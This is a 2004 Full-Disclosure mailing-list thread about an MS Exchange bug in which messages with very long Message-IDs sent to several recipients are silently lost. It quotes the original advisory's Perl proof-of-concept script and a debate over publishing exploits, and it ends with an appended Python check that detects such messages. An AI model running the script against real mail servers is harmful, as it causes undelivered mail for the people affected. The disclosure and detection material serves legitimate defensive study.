Message-ID: <BAY7-DAV439ZfjIInTe0000d59d@hotmail.com>
From: rlanguy at hotmail.com (Lan Guy)
Subject: RE: Full-Disclosure MS Exchange message lost-so lets post how
I tried sending an email with a subject length of 255 chars (maximum) with
multiple recipients on three Exchange 2003 Servers, none of which exhibited
the behaviour you described. All messages to internal and external
recipients were received.
Lan Guy
----- Original Message -----
From: "RandallM" <randallm@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Thursday, May 13, 2004 4:45 AM
Subject: [Full-Disclosure] RE: Full-Disclosure MS Exchange message lost-so
lets post how
>I am using the following only as an example that has been slightly
>discussed
> here. The gentleman rightly posts and gives us the information that is
> very
> helpful to be aware of. But then posts the "exploit" example because, in
> his
> own words,
>
> <|>I think some people know how to use this "FEATURE" ... I hope this
> post
> <|>will speed up the fix release!
>
> Exactly in what way do you think this should speed up the release?
>
> Granted, this is a "lost" email exploit. But what if it was a dangerous
> exploit? I have seen these also posted.
>
> I know of "script Kiddies" who would never be able to find the exploit but
> are part of the group who "know how to use this 'FEATURE'...". They watch
> here and others just for that purpose. Where is accountability? I am torn
> between this issue of needed knowledge and exposed exploit. As a network
> Administrator I have no need for the exploit but for the knowledge. I have
> found no better place than here for that. Then on the other hand you all
> give out the exploits for confirmation which is needed also. Just some of
> my
> personal inward ramblings.
>
> thank you
> Randall M
>
>
> <|>--__--__--
> <|>
> <|>Message: 20
> <|>Date: Wed, 12 May 2004 11:52:23 +0200 (MEST)
> <|>From: I.D.S@....de
> <|>To: full-disclosure@...ts.netsys.com
> <|>Subject: [Full-Disclosure] MS Exchange message lost
> <|>
> <|>* MS Exchange duplicate message fault (message lost)
> <|>*
> <|>* MS Exchange (all versions affected) duplicate message fault
> <|>*
> <|>* I discovered this bug independently on 10, 2003
> <|>*
> <|>* public post 05, 2004
> <|>*
> <|>* Helmut Schmitz < i.d.s@....de >
> <|>*
> <|>* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET - */
> <|>
> <|>MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
> <|>Messages with long message ids (>189 bytes?)to more than one recipient
> <|>(cc),
> <|>the message will not be delivered correctly ... there is no correct
> logging
> <|>!!,
> <|>the messages will be delivered to only one Recipient ... the message to
> <|>the
> <|>other will be lost !!
> <|>
> <|>I have sent this issue to Microsoft (10.2003) ... some months later
> <|>(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81)
> with
> <|>some reg settings fixes (workaround ;-) the problem.
> <|>
> <|>Perl Example (test exploit) ...
> <|>
> <|>#!/usr/bin/perl -w
> <|>use Net::SMTP;
> <|>$from = 'sender@...rdomain.de';
> <|>$to = 'user1@...rdomain.de';
> <|>$cc = 'user2@...rdomain.de';
> <|>$subject = 'Test Email';
> <|>$smtp = Net::SMTP->new('yourmailserver');
> <|>$smtp->mail($from);
> <|>$smtp->to($to);
> <|>$smtp->cc($cc);
> <|>$smtp->data();
> <|>$smtp->datasend("To: <$to>\n");
> <|>$smtp->datasend("Cc: <$cc>\n");
> <|>$smtp->datasend("From: <$from>\n");
> <|>$smtp->datasend("Subject: $subject\n");
> <|>$smtp->datasend("Message-ID:
> <|><veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhte
> <|>ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng
> <|>eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei
> <|>feejktmhedgedherngrondljzhng> \n");
> <|>$smtp->datasend("Hallo\n");
> <|>$smtp->datasend("123\n");
> <|>$smtp->datasend("123\n");
> <|>$smtp->datasend("123\n");
> <|>$smtp->dataend();
> <|>$smtp->quit;
> <|>
> <|>Background:
> <|>Duplicate detection is decided by three factors. These are MessageID,
> <|>RootFID (the root folder ID of the mailbox) and the SubmitTime into the
> <|>store. These are used to build a unique key when the message is
> <|>submitted.
> <|>If all the factors are the same value, then we recognize the message as
> <|>duplicate.
> <|>
> <|>###################################
> <|>
> <|>I think some people know how to use this "FEATURE" ... I hope this
> post
> <|>will speed up the fix release!
> <|>
> <|>Regards,
> <|>Helmut Schmitz
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
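A defensive check for the condition described in the quoted advisory, added here as an example and not part of any post in this thread: it flags messages whose Message-ID exceeds the advisory's tentative 189-byte figure and that name more than one distinct To/Cc recipient. The function names, the sample messages, and the choices to count the angle brackets and to use header (not envelope) recipients are assumptions.

```python
from email import message_from_string
from email.utils import getaddresses

# Tentative figure from the quoted advisory (">189 bytes?"); adjust as needed.
MSGID_LIMIT = 189


def check_message(raw, limit=MSGID_LIMIT):
    """Return a finding dict when the message has an over-long Message-ID
    and more than one distinct To/Cc recipient, otherwise None."""
    msg = message_from_string(raw)
    # A folded header keeps its line breaks; drop all whitespace to unfold.
    msgid = "".join(str(msg.get("Message-ID") or "").split())
    # Assumption: the length counts the surrounding angle brackets.
    size = len(msgid.encode("utf-8", "surrogateescape"))
    headers = msg.get_all("To", []) + msg.get_all("Cc", [])
    rcpts = sorted({addr.lower() for _, addr in getaddresses(headers) if addr})
    if size > limit and len(rcpts) > 1:
        return {"message_id_bytes": size, "recipients": rcpts}
    return None


def build_sample(msgid, to, cc=None, fold=False):
    """Construct a minimal message for testing (constructed data)."""
    lines = ["From: <sender@example.test>", "To: " + to]
    if cc:
        lines.append("Cc: " + cc)
    lines.append("Subject: Test Email")
    # Optionally fold the header onto a continuation line.
    lines.append("Message-ID:\n " + msgid if fold else "Message-ID: " + msgid)
    return "\n".join(lines) + "\n\nHallo\n"


if __name__ == "__main__":
    long_id = "<" + "a" * 200 + "@example.test>"
    u1, u2 = "<user1@example.test>", "<user2@example.test>"
    for name, raw in [
        ("long id, two recipients", build_sample(long_id, u1, u2)),
        ("long id, one recipient", build_sample(long_id, u1)),
        ("short id, two recipients", build_sample("<1@example.test>", u1, u2)),
    ]:
        print(name, "->", check_message(raw))
```

Run at a gateway or over an archived mail spool, a hit identifies messages worth tracing through the store for missing deliveries.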